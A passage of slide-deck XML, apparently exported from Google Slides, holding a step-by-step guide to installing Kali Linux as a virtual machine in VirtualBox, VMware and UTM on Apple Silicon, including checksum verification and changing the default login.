          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Google Shape;642;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="4046220"/>
            <a:ext cx="229743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Free &amp; open source</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="Google Shape;643;p34"/>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Choosing your hypervisor</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Google Shape;644;p34"/>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49" name="Shape 649"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="Google Shape;650;p35"/>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SETUP GUIDE, PART 1</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Google Shape;651;p35"/>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Installing Kali: VirtualBox &amp; VMware (AMD64)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652" name="Google Shape;652;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1131570"/>
            <a:ext cx="816102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Kali publishes ready-made VM images for both. You're importing a finished machine, not installing from scratch.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Google Shape;653;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="154305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4" name="Google Shape;654;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="1717929"/>
            <a:ext cx="301752" cy="301752"/>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5" name="Google Shape;655;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="171792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1</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Google Shape;656;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="163220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Install the hypervisor</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="Google Shape;657;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="185851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Download VirtualBox (virtualbox.org) or VMware Workstation/Fusion (broadcom.com)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="Google Shape;658;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="154305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59" name="Google Shape;659;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="1717929"/>
            <a:ext cx="301752" cy="301752"/>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0" name="Google Shape;660;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="171792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2</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Google Shape;661;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="163220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Download the Kali image</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Google Shape;662;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="185851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From kali.org/get-kali, under "Virtual Machines," pick VirtualBox or VMware, AMD64</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Google Shape;663;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="233172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4" name="Google Shape;664;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="2506599"/>
            <a:ext cx="301752" cy="301752"/>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5" name="Google Shape;665;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="250659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3</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="666" name="Google Shape;666;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="242087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Verify the checksum</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Google Shape;667;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="264718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Compare the file's SHA256 against the value listed on kali.org, never skip this</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Google Shape;668;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="233172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69" name="Google Shape;669;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="2506599"/>
            <a:ext cx="301752" cy="301752"/>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70" name="Google Shape;670;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="250659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4</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Google Shape;671;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="242087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Extract the archive</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Google Shape;672;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="264718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The download is a .7z, extract it with 7-Zip or your OS's archive tool</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Google Shape;673;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="312039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74" name="Google Shape;674;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="3295269"/>
            <a:ext cx="301752" cy="301752"/>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75" name="Google Shape;675;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="329526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5</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Google Shape;676;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="320954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Import it</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="677" name="Google Shape;677;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="343585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In VirtualBox: Add, then select the .vbox file. In VMware: Open, then select the .vmx</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Google Shape;678;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="312039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79" name="Google Shape;679;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="3295269"/>
            <a:ext cx="301752" cy="301752"/>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80" name="Google Shape;680;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="329526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6</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Google Shape;681;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="320954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Boot and log in</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Google Shape;682;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="343585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Default credentials are kali / kali. Change the password immediately.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Google Shape;683;p35"/>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Setup guide: VirtualBox &amp; VMware</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Google Shape;684;p35"/>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89" name="Shape 689"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Google Shape;690;p36"/>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SETUP GUIDE, PART 2</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Google Shape;691;p36"/>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Installing Kali: UTM (Apple Silicon / ARM64)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="Google Shape;692;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1131570"/>
            <a:ext cx="8161020" cy="37719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900"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="6B6560"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>No pre-built UTM image yet, so this path installs from the ARM64 ISO. There's one macOS-specific quirk: the display blacks out mid-install, so you'll add a temporary serial console first.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Google Shape;693;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="161163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4" name="Google Shape;694;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="1786509"/>
            <a:ext cx="301752" cy="30175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5" name="Google Shape;695;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="178650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1</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696" name="Google Shape;696;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="170078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Install UTM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Google Shape;697;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="192709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Download from mac.getutm.app (or the Mac App Store)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="Google Shape;698;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="161163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99" name="Google Shape;699;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="1786509"/>
            <a:ext cx="301752" cy="30175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00" name="Google Shape;700;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="178650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2</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="Google Shape;701;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="170078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Download the ISO</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Google Shape;702;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="192709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From kali.org/get-kali, choose "Apple Silicon (ARM64)" installer image</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Google Shape;703;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="240030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04" name="Google Shape;704;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="2575179"/>
            <a:ext cx="301752" cy="30175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05" name="Google Shape;705;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="257517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3</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Google Shape;706;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="248945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Create a new VM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="707" name="Google Shape;707;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="271576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UTM: + then Virtualize, then Linux, then browse to your Kali ISO</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Google Shape;708;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="240030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09" name="Google Shape;709;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="2575179"/>
            <a:ext cx="301752" cy="30175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10" name="Google Shape;710;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="257517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4</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Google Shape;711;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="248945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Add a second Serial device</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
